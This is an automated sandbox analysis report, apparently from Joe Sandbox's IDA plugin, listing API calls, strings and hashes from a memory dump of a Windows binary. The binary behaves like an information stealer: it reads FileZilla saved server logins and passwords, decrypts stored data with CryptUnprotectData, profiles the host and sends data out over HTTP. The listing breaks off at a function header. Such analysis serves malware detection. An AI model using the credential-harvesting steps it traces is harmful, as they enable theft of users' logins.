Function 004155A0 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 58encryptionCOMMON

Download Yara Rule

APIs

CryptBinaryToStringA.CRYPT32(00000000,>N@,40000001,00000000,00000000), ref: 004155C0

Strings

>N@, xrefs: 004155B8, 00415614, 004155BB, 00415617

Memory Dump Source

Source File: 00000001.00000002.2496868143.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2496868143.0000000000448000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2496868143.000000000044B000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2496868143.0000000000549000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2496868143.0000000000624000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2496868143.0000000000636000.00000040.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_u5c4.jbxd

Yara matches

Similarity

API ID: BinaryCryptString
String ID: >N@
API String ID: 80407269-3381801619
Opcode ID: 718bb6be1b75e617e987197471ae693474da6023ddc0167bf927d0320b7ad6f5
Instruction ID: 37622f5e64546725dbf22d4b9568f407ee9b467eb6af981ec2fff7c5b56759cd
Opcode Fuzzy Hash: 718bb6be1b75e617e987197471ae693474da6023ddc0167bf927d0320b7ad6f5
Instruction Fuzzy Hash: 73110D74200A04FFDB10CFA4E844FEB37AABF89310F509549F9098B254D775E881DBA4

Uniqueness

Uniqueness Score: -1.00%

Function 00415D00 Relevance: 7.5, APIs: 5, Instructions: 42processCOMMON

Download Yara Rule

APIs

CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 00415D1E
Process32First.KERNEL32(0041D599,00000128), ref: 00415D32
Process32Next.KERNEL32(0041D599,00000128), ref: 00415D47
StrCmpCA.SHLWAPI(?,00000000), ref: 00415D5C
CloseHandle.KERNEL32(0041D599), ref: 00415D7A

Memory Dump Source

Source File: 00000001.00000002.2496868143.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2496868143.0000000000448000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2496868143.000000000044B000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2496868143.0000000000549000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2496868143.0000000000624000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2496868143.0000000000636000.00000040.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_u5c4.jbxd

Yara matches

Similarity

API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32
String ID:
API String ID: 420147892-0
Opcode ID: f6d0f21b7cc225942ebaf2b71921687e4bacd107d031d79921886f9976f157bb
Instruction ID: 4a4bbd9776da2ad99231b6c5471aa9e11f786ff18f9e7f574f496e4dc08d41d8
Opcode Fuzzy Hash: f6d0f21b7cc225942ebaf2b71921687e4bacd107d031d79921886f9976f157bb
Instruction Fuzzy Hash: 53012575A00608EBDB24DF94DD58BDEB7B9BF88304F108189E90597250DB749B81CF50

Uniqueness

Uniqueness Score: -1.00%

Function 004144B0 Relevance: 6.0, APIs: 4, Instructions: 32memorytimeCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000000,00000104,00000000,00000000,?,043769D8,00000000,?,0041D758,00000000,?,00000000,00000000,?,04377410,00000000), ref: 004144C0
HeapAlloc.KERNEL32(00000000), ref: 004144C7
GetTimeZoneInformation.KERNEL32(?), ref: 004144DA
wsprintfA.USER32 ref: 00414514

Memory Dump Source

Source File: 00000001.00000002.2496868143.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2496868143.0000000000448000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2496868143.000000000044B000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2496868143.0000000000549000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2496868143.0000000000624000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2496868143.0000000000636000.00000040.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_u5c4.jbxd

Yara matches

Similarity

API ID: Heap$AllocInformationProcessTimeZonewsprintf
String ID:
API String ID: 362916592-0
Opcode ID: 3e8ee039c0baa52381bc867147264b9e0472758f99ecf5fc77eb662dd471fe6c
Instruction ID: 63b956e3650aea0bdd01ac085b80a838c67200ff8d98e36f2a49cf33a9f6a1bd
Opcode Fuzzy Hash: 3e8ee039c0baa52381bc867147264b9e0472758f99ecf5fc77eb662dd471fe6c
Instruction Fuzzy Hash: C7F06770E047289BDB309B64DD49FA9737ABB44311F0002D5EA0AE3291DB749E858F97

Uniqueness

Uniqueness Score: -1.00%

Function 00409540 Relevance: 4.5, APIs: 3, Instructions: 49memoryencryptionCOMMON

Download Yara Rule

APIs

CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,?), ref: 00409564
LocalAlloc.KERNEL32(00000040,00000000), ref: 00409583
LocalFree.KERNEL32(?), ref: 004095AF

Memory Dump Source

Source File: 00000001.00000002.2496868143.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2496868143.0000000000448000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2496868143.000000000044B000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2496868143.0000000000549000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2496868143.0000000000624000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2496868143.0000000000636000.00000040.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_u5c4.jbxd

Yara matches

Similarity

API ID: Local$AllocCryptDataFreeUnprotect
String ID:
API String ID: 2068576380-0
Opcode ID: 22788d86bb0e3b36a7a96175dcc17964957ca332b329b0ec9e9903d4a9c63904
Instruction ID: 845aa5354f8c35be15d3c308e338542aeef751caf2e905b87ee6994bb5fcaacd
Opcode Fuzzy Hash: 22788d86bb0e3b36a7a96175dcc17964957ca332b329b0ec9e9903d4a9c63904
Instruction Fuzzy Hash: 2B11B7B8A00609EFCB04DF94C984AAEB7B5FF88301F104559E915A7390D774AE51CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 004143C0 Relevance: 4.5, APIs: 3, Instructions: 19memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000000,00000104,00401177,04370930,004136EB,0041D6E3), ref: 004143CD
HeapAlloc.KERNEL32(00000000), ref: 004143D4
GetUserNameA.ADVAPI32(?,00000104), ref: 004143EC

Memory Dump Source

Source File: 00000001.00000002.2496868143.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2496868143.0000000000448000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2496868143.000000000044B000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2496868143.0000000000549000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2496868143.0000000000624000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2496868143.0000000000636000.00000040.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_u5c4.jbxd

Yara matches

Similarity

API ID: Heap$AllocNameProcessUser
String ID:
API String ID: 1206570057-0
Opcode ID: 19f43c5935948d257337b5cfe167422182bb8e9e8b16b88c7073f3e19bcb2857
Instruction ID: fd22aaf49eebc4deedfa71bce2fb200d05227bfc9b63873cd8cb515d50d954e6
Opcode Fuzzy Hash: 19f43c5935948d257337b5cfe167422182bb8e9e8b16b88c7073f3e19bcb2857
Instruction Fuzzy Hash: 2CE08CB490070CFFCB20EFE4DC49E9CBBB8AB08312F000184FA09E3280DB7056848B91

Uniqueness

Uniqueness Score: -1.00%

Function 00401120 Relevance: 3.0, APIs: 2, Instructions: 15COMMON

Download Yara Rule

APIs

GetSystemInfo.KERNEL32(?,?,?,?,?,?,?,?,?,004136D7,0041D6E3), ref: 0040112A
ExitProcess.KERNEL32 ref: 0040113E

Memory Dump Source

Source File: 00000001.00000002.2496868143.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2496868143.0000000000448000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2496868143.000000000044B000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2496868143.0000000000549000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2496868143.0000000000624000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2496868143.0000000000636000.00000040.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_u5c4.jbxd

Yara matches

Similarity

API ID: ExitInfoProcessSystem
String ID:
API String ID: 752954902-0
Opcode ID: 0c78e0eb242a3f19764e03ad46aab426447ce2b04c76b8959ffb9729e3075d63
Instruction ID: 30efb513975bfe185fa80fb3a8f84b393628ccfbb0aa9170a1b214bc368b0093
Opcode Fuzzy Hash: 0c78e0eb242a3f19764e03ad46aab426447ce2b04c76b8959ffb9729e3075d63
Instruction Fuzzy Hash: B6D05E7490020C8BCB14DFE09A496DDBBB9AB8D711F001455DD0572240DA305441CA65

Uniqueness

Uniqueness Score: -1.00%

Function 004070E0 Relevance: 81.6, APIs: 54, Instructions: 584
stringmemoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetProcessHeap.KERNEL32(00000000,0098967F,?,00413068,?), ref: 004070F4
RtlAllocateHeap.NTDLL(00000000,?,00413068,?), ref: 004070FB
lstrcat.KERNEL32(?,04373A18), ref: 004072AB
lstrcat.KERNEL32(?,?), ref: 004072BF
lstrcat.KERNEL32(?,?), ref: 004072D3
lstrcat.KERNEL32(?,?), ref: 004072E7
lstrcat.KERNEL32(?,04376DC8), ref: 004072FB
lstrcat.KERNEL32(?,04376D98), ref: 0040730F
lstrcat.KERNEL32(?,04378990), ref: 00407322
lstrcat.KERNEL32(?,04378AE0), ref: 00407336
lstrcat.KERNEL32(?,04373AA0), ref: 0040734A
lstrcat.KERNEL32(?,?), ref: 0040735E
lstrcat.KERNEL32(?,?), ref: 00407372
lstrcat.KERNEL32(?,?), ref: 00407386
lstrcat.KERNEL32(?,04376DC8), ref: 00407399
lstrcat.KERNEL32(?,04376D98), ref: 004073AD
lstrcat.KERNEL32(?,04378990), ref: 004073C1
lstrcat.KERNEL32(?,04378AE0), ref: 004073D4
lstrcat.KERNEL32(?,04373B08), ref: 004073E8
lstrcat.KERNEL32(?,?), ref: 004073FC
lstrcat.KERNEL32(?,?), ref: 00407410
lstrcat.KERNEL32(?,?), ref: 00407424
lstrcat.KERNEL32(?,04376DC8), ref: 00407438
lstrcat.KERNEL32(?,04376D98), ref: 0040744B
lstrcat.KERNEL32(?,04378990), ref: 0040745F
lstrcat.KERNEL32(?,04378AE0), ref: 00407473
lstrcat.KERNEL32(?,04373B70), ref: 00407486
lstrcat.KERNEL32(?,?), ref: 0040749A
lstrcat.KERNEL32(?,?), ref: 004074AE
lstrcat.KERNEL32(?,?), ref: 004074C2
lstrcat.KERNEL32(?,04376DC8), ref: 004074D6
lstrcat.KERNEL32(?,04376D98), ref: 004074EA
lstrcat.KERNEL32(?,04378990), ref: 004074FD
lstrcat.KERNEL32(?,04378AE0), ref: 00407511
lstrcat.KERNEL32(?,04378290), ref: 00407525
lstrcat.KERNEL32(?,?), ref: 00407539
lstrcat.KERNEL32(?,?), ref: 0040754D
lstrcat.KERNEL32(?,?), ref: 00407561
lstrcat.KERNEL32(?,04376DC8), ref: 00407574
lstrcat.KERNEL32(?,04376D98), ref: 00407588
lstrcat.KERNEL32(?,04378990), ref: 0040759C
lstrcat.KERNEL32(?,04378AE0), ref: 004075AF
lstrcat.KERNEL32(?,043782F8), ref: 004075C3
lstrcat.KERNEL32(?,?), ref: 004075D7
lstrcat.KERNEL32(?,?), ref: 004075EB
lstrcat.KERNEL32(?,?), ref: 004075FF
lstrcat.KERNEL32(?,04376DC8), ref: 00407613
lstrcat.KERNEL32(?,04376D98), ref: 00407626
lstrcat.KERNEL32(?,04378990), ref: 0040763A
lstrcat.KERNEL32(?,04378AE0), ref: 0040764E

Part of subcall function 00406FA0: lstrcat.KERNEL32(308C9020,0041DEB8), ref: 00406FD6
Part of subcall function 00406FA0: lstrcat.KERNEL32(308C9020,00000000), ref: 00407018
Part of subcall function 00406FA0: lstrcat.KERNEL32(308C9020, : ), ref: 0040702A
Part of subcall function 00406FA0: lstrcat.KERNEL32(308C9020,00000000), ref: 0040705F
Part of subcall function 00406FA0: lstrcat.KERNEL32(308C9020,0041DEC0), ref: 00407070
Part of subcall function 00406FA0: lstrcat.KERNEL32(308C9020,00000000), ref: 004070A3
Part of subcall function 00406FA0: lstrcat.KERNEL32(308C9020,0041DEC4), ref: 004070BD
Part of subcall function 00406FA0: task.LIBCPMTD ref: 004070CB

lstrcat.KERNEL32(?,04370A10), ref: 004077DB
lstrcat.KERNEL32(?,04377A50), ref: 004077EE
lstrlen.KERNEL32(308C9020), ref: 004077FB
lstrlen.KERNEL32(308C9020), ref: 0040780B

Part of subcall function 00416D40: lstrcpy.KERNEL32(0041D6E3,00000000), ref: 00416D88

Part of subcall function 00404DC0: lstrlen.KERNEL32(00000000), ref: 00404E4A
Part of subcall function 00404DC0: InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 00404EBB
Part of subcall function 00404DC0: StrCmpCA.SHLWAPI(?,04370BC0), ref: 00404ED9

Memory Dump Source

Source File: 00000001.00000002.2496868143.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2496868143.0000000000448000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2496868143.000000000044B000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2496868143.0000000000549000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2496868143.0000000000624000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2496868143.0000000000636000.00000040.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_u5c4.jbxd

Yara matches

Similarity

API ID: lstrcat$lstrlen$Heap$AllocateInternetOpenProcesslstrcpytask
String ID:
API String ID: 3958002797-0
Opcode ID: 1deb68fe007c3a931c0a137675a9dba7412e12439f4df884cae112fa19bd3d59
Instruction ID: 3e78b0701875fb024adfa953bd7607f570b92d72e3b87f8e208063dda3fe5bd2
Opcode Fuzzy Hash: 1deb68fe007c3a931c0a137675a9dba7412e12439f4df884cae112fa19bd3d59
Instruction Fuzzy Hash: D33234B6D01A14ABCB35EBA0DC89DDE737DAB48704F404699B20A66090DF78E7C5CF94

Uniqueness

Uniqueness Score: -1.00%

Function 0040EA90 Relevance: 73.9, APIs: 32, Strings: 10, Instructions: 363
stringmemoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00416D40: lstrcpy.KERNEL32(0041D6E3,00000000), ref: 00416D88

Part of subcall function 004154E0: SHGetFolderPathA.SHELL32(00000000,?,00000000,00000000,?,?,000003E8), ref: 0041550B

Part of subcall function 00416F20: lstrcpy.KERNEL32(00000000,?), ref: 00416F72
Part of subcall function 00416F20: lstrcat.KERNEL32(00000000), ref: 00416F82

Part of subcall function 00416EA0: lstrcpy.KERNEL32(?,0041D6E3), ref: 00416F05

Part of subcall function 00416FB0: lstrlen.KERNEL32(?,0041D8B0,?,00000000,0041D6E3), ref: 00416FC5
Part of subcall function 00416FB0: lstrcpy.KERNEL32(00000000), ref: 00417004
Part of subcall function 00416FB0: lstrcat.KERNEL32(00000000,00000000), ref: 00417012

Part of subcall function 00416DA0: lstrcpy.KERNEL32(?,00000000), ref: 00416DE6

Part of subcall function 004093A0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 004093CC
Part of subcall function 004093A0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 004093F1
Part of subcall function 004093A0: LocalAlloc.KERNEL32(00000040,?), ref: 00409411
Part of subcall function 004093A0: ReadFile.KERNEL32(000000FF,?,00000000,'@,00000000), ref: 0040943A
Part of subcall function 004093A0: LocalFree.KERNEL32('@), ref: 00409470
Part of subcall function 004093A0: FindCloseChangeNotification.KERNEL32(000000FF), ref: 0040947A

Part of subcall function 00415530: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00415552

strtok_s.MSVCRT ref: 0040EB5B
GetProcessHeap.KERNEL32(00000000,000F423F,0041D77A,0041D777,0041D776,0041D773), ref: 0040EBA2
HeapAlloc.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,0041D772), ref: 0040EBA9
StrStrA.SHLWAPI(00000000,<Host>), ref: 0040EBC5
lstrlen.KERNEL32(00000000), ref: 0040EBD3

Part of subcall function 00414FA0: malloc.MSVCRT ref: 00414FA8
Part of subcall function 00414FA0: strncpy.MSVCRT ref: 00414FC3

StrStrA.SHLWAPI(00000000,<Port>), ref: 0040EC0F
lstrlen.KERNEL32(00000000), ref: 0040EC1D
StrStrA.SHLWAPI(00000000,<User>), ref: 0040EC59
lstrlen.KERNEL32(00000000), ref: 0040EC67
StrStrA.SHLWAPI(00000000,<Pass encoding="base64">), ref: 0040ECA3
lstrlen.KERNEL32(00000000), ref: 0040ECB5
lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,0041D772), ref: 0040ED42
lstrlen.KERNEL32(00000000,?,?,00000000), ref: 0040ED5A
lstrlen.KERNEL32(00000000,?,?,00000000), ref: 0040ED72
lstrlen.KERNEL32(00000000,?,?,00000000), ref: 0040ED8A
lstrcat.KERNEL32(?,browser: FileZilla), ref: 0040EDA2
lstrcat.KERNEL32(?,profile: null), ref: 0040EDB1
lstrcat.KERNEL32(?,url: ), ref: 0040EDC0
lstrcat.KERNEL32(?,00000000), ref: 0040EDD3
lstrcat.KERNEL32(?,0041DD34), ref: 0040EDE2
lstrcat.KERNEL32(?,00000000), ref: 0040EDF5
lstrcat.KERNEL32(?,0041DD38), ref: 0040EE04
lstrcat.KERNEL32(?,login: ), ref: 0040EE13
lstrcat.KERNEL32(?,00000000), ref: 0040EE26
lstrcat.KERNEL32(?,0041DD44), ref: 0040EE35
lstrcat.KERNEL32(?,password: ), ref: 0040EE44
lstrcat.KERNEL32(?,00000000), ref: 0040EE57
lstrcat.KERNEL32(?,0041DD54), ref: 0040EE66
lstrcat.KERNEL32(?,0041DD58), ref: 0040EE75
strtok_s.MSVCRT ref: 0040EEB9
lstrlen.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,0041D772), ref: 0040EECE
memset.MSVCRT ref: 0040EF17

Strings

<Host>, xrefs: 0040EBBC
browser: FileZilla, xrefs: 0040ED99
url: , xrefs: 0040EDB7
profile: null, xrefs: 0040EDA8
password: , xrefs: 0040EE3B
<Pass encoding="base64">, xrefs: 0040EC9A
login: , xrefs: 0040EE0A
\AppData\Roaming\FileZilla\recentservers.xml, xrefs: 0040EAE4
<Port>, xrefs: 0040EC06
<User>, xrefs: 0040EC50

Memory Dump Source

Source File: 00000001.00000002.2496868143.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2496868143.0000000000448000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2496868143.000000000044B000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2496868143.0000000000549000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2496868143.0000000000624000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2496868143.0000000000636000.00000040.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_u5c4.jbxd

Yara matches

Similarity

API ID: lstrcat$lstrlen$lstrcpy$AllocFileLocal$Heapstrtok_s$ChangeCloseCreateFindFolderFreeNotificationPathProcessReadSizemallocmemsetstrncpy
String ID: <Host>$<Pass encoding="base64">$<Port>$<User>$\AppData\Roaming\FileZilla\recentservers.xml$browser: FileZilla$login: $password: $profile: null$url:
API String ID: 1266801029-555421843
Opcode ID: 69bd349b282df7ba6b8db11135eb5aaf6ea59cc80ae1b81a19c62369651b1021
Instruction ID: d9186ee441f73b04c887f2efee86d04259a2264df0fa853aa1509dbc15227f06
Opcode Fuzzy Hash: 69bd349b282df7ba6b8db11135eb5aaf6ea59cc80ae1b81a19c62369651b1021
Instruction Fuzzy Hash: 3FD174B5D00208ABCB14EBF1DD56EEE7739AF44304F50851EF106B6095DF38AA85CBA8

Uniqueness

Uniqueness Score: -1.00%

Function 00415ED0 Relevance: 59.7, APIs: 33, Strings: 1, Instructions: 212
libraryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetProcAddress.KERNEL32(74DD0000,04352970), ref: 00415F11
GetProcAddress.KERNEL32(74DD0000,04352988), ref: 00415F2A
GetProcAddress.KERNEL32(74DD0000,043528E0), ref: 00415F42
GetProcAddress.KERNEL32(74DD0000,043528F8), ref: 00415F5A
GetProcAddress.KERNEL32(74DD0000,04352928), ref: 00415F73
GetProcAddress.KERNEL32(74DD0000,0436D970), ref: 00415F8B
GetProcAddress.KERNEL32(74DD0000,043542B8), ref: 00415FA3
GetProcAddress.KERNEL32(74DD0000,043543D8), ref: 00415FBC
GetProcAddress.KERNEL32(74DD0000,04370370), ref: 00415FD4
GetProcAddress.KERNEL32(74DD0000,04370340), ref: 00415FEC
GetProcAddress.KERNEL32(74DD0000,04370430), ref: 00416005
GetProcAddress.KERNEL32(74DD0000,04370220), ref: 0041601D
GetProcAddress.KERNEL32(74DD0000,043544D8), ref: 00416035
GetProcAddress.KERNEL32(74DD0000,04370448), ref: 0041604E
GetProcAddress.KERNEL32(74DD0000,04370268), ref: 00416066
GetProcAddress.KERNEL32(74DD0000,04354598), ref: 0041607E
GetProcAddress.KERNEL32(74DD0000,04370328), ref: 00416097
GetProcAddress.KERNEL32(74DD0000,04370280), ref: 004160AF
GetProcAddress.KERNEL32(74DD0000,043544F8), ref: 004160C7
GetProcAddress.KERNEL32(74DD0000,043703A0), ref: 004160E0
GetProcAddress.KERNEL32(74DD0000,043543F8), ref: 004160F8
LoadLibraryA.KERNEL32(04370460,?,004136C0), ref: 0041610A
LoadLibraryA.KERNEL32(04370478,?,004136C0), ref: 0041611B
LoadLibraryA.KERNEL32(04370490,?,004136C0), ref: 0041612D
LoadLibraryA.KERNEL32(04370298,?,004136C0), ref: 0041613F
LoadLibraryA.KERNEL32(043703B8,?,004136C0), ref: 00416150
GetProcAddress.KERNEL32(75A70000,043701F0), ref: 00416172
GetProcAddress.KERNEL32(75290000,043704A8), ref: 00416193
GetProcAddress.KERNEL32(75290000,043704C0), ref: 004161AB
GetProcAddress.KERNEL32(75BD0000,04370238), ref: 004161CD
GetProcAddress.KERNEL32(75450000,04354618), ref: 004161EE
GetProcAddress.KERNEL32(76E90000,0436D990), ref: 0041620F
GetProcAddress.KERNEL32(76E90000,NtQueryInformationProcess), ref: 00416226

Strings

NtQueryInformationProcess, xrefs: 0041621A

Memory Dump Source

Source File: 00000001.00000002.2496868143.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2496868143.0000000000448000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2496868143.000000000044B000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2496868143.0000000000549000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2496868143.0000000000624000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2496868143.0000000000636000.00000040.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_u5c4.jbxd

Yara matches

Similarity

API ID: AddressProc$LibraryLoad
String ID: NtQueryInformationProcess
API String ID: 2238633743-2781105232
Opcode ID: 4bf4faa6d80337b6a8c58e308678245154ae8b5c2676724c8d6fcdc68551e2bc
Instruction ID: 1024ce913f91588aaf476b7e35ab3ad31cc185c195c2877b0ef9f81f7e935ec9
Opcode Fuzzy Hash: 4bf4faa6d80337b6a8c58e308678245154ae8b5c2676724c8d6fcdc68551e2bc
Instruction Fuzzy Hash: 4CA16FB5910E10AFC374DFA8FE88A1637BBBBCC3117116519A60AC72A0DF759482CF95

Uniqueness

Uniqueness Score: -1.00%

Function 00404DC0 Relevance: 54.8, APIs: 22, Strings: 9, Instructions: 569
stringnetworkmemoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00416DA0: lstrcpy.KERNEL32(?,00000000), ref: 00416DE6

Part of subcall function 00404470: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 004044F6
Part of subcall function 00404470: InternetCrackUrlA.WININET(00000000,00000000), ref: 00404506

lstrlen.KERNEL32(00000000), ref: 00404E4A

Part of subcall function 004155A0: CryptBinaryToStringA.CRYPT32(00000000,>N@,40000001,00000000,00000000), ref: 004155C0

Part of subcall function 00416D40: lstrcpy.KERNEL32(0041D6E3,00000000), ref: 00416D88

InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 00404EBB
StrCmpCA.SHLWAPI(?,04370BC0), ref: 00404ED9
InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00404FF4
HttpOpenRequestA.WININET(00000000,04370AE0,?,04378A80,00000000,00000000,00400100,00000000), ref: 00405058

Part of subcall function 00416FB0: lstrlen.KERNEL32(?,0041D8B0,?,00000000,0041D6E3), ref: 00416FC5
Part of subcall function 00416FB0: lstrcpy.KERNEL32(00000000), ref: 00417004
Part of subcall function 00416FB0: lstrcat.KERNEL32(00000000,00000000), ref: 00417012

Part of subcall function 00416EA0: lstrcpy.KERNEL32(?,0041D6E3), ref: 00416F05

Part of subcall function 00416F20: lstrcpy.KERNEL32(00000000,?), ref: 00416F72
Part of subcall function 00416F20: lstrcat.KERNEL32(00000000), ref: 00416F82

lstrlen.KERNEL32(00000000,00000000,?,",00000000,?,04370B90,00000000,?,043781D8,00000000,?,0041E098,00000000,?,00410996), ref: 004053EB
lstrlen.KERNEL32(00000000), ref: 004053FF
GetProcessHeap.KERNEL32(00000000,?), ref: 00405410
HeapAlloc.KERNEL32(00000000), ref: 00405417
lstrlen.KERNEL32(00000000), ref: 0040542C
memcpy.MSVCRT ref: 00405443
lstrlen.KERNEL32(00000000,00000000,00000000), ref: 0040545D
memcpy.MSVCRT ref: 0040546A
lstrlen.KERNEL32(00000000), ref: 0040547C
lstrlen.KERNEL32(00000000,00000000,00000000), ref: 00405495
memcpy.MSVCRT ref: 004054A5
lstrlen.KERNEL32(00000000,?,?), ref: 004054C2
HttpSendRequestA.WININET(00000000,00000000,00000000), ref: 004054D6
InternetReadFile.WININET(00000000,?,000007CF,?), ref: 00405501
InternetCloseHandle.WININET(00000000), ref: 00405565
InternetCloseHandle.WININET(00000000), ref: 00405572
InternetCloseHandle.WININET(00000000), ref: 0040557C

Strings

------, xrefs: 0040506B
J&f, xrefs: 00405029
------, xrefs: 00404F4B
------, xrefs: 004052EF
", xrefs: 00405278
------, xrefs: 004051AD
", xrefs: 004053BA
--, xrefs: 00404F34
", xrefs: 00405136

Memory Dump Source

Source File: 00000001.00000002.2496868143.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2496868143.0000000000448000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2496868143.000000000044B000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2496868143.0000000000549000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2496868143.0000000000624000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2496868143.0000000000636000.00000040.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_u5c4.jbxd

Yara matches

Similarity

API ID: lstrlen$Internet$lstrcpy$CloseHandlememcpy$HeapHttpOpenRequestlstrcat$AllocBinaryConnectCrackCryptFileProcessReadSendString
String ID: ------$"$"$"$--$------$------$------$J&f
API String ID: 2633831070-3705675087
Opcode ID: 465e31c50ca583c8e17bae36ce337e8ad2033ac8c63f841b0aa9da903d8ddf65
Instruction ID: 5eac6181e64dcc8a416a420aa9bf91bf90c69560f183aa6c55bc1ab780bc5ff6
Opcode Fuzzy Hash: 465e31c50ca583c8e17bae36ce337e8ad2033ac8c63f841b0aa9da903d8ddf65
Instruction Fuzzy Hash: 55324375920218ABCB14EBA1DC51FEEB779BF54704F40419EF10662091DF38AB89CFA8

Uniqueness

Uniqueness Score: -1.00%

Function 00405610 Relevance: 47.7, APIs: 19, Strings: 8, Instructions: 493
networkstringmemoryCOMMON

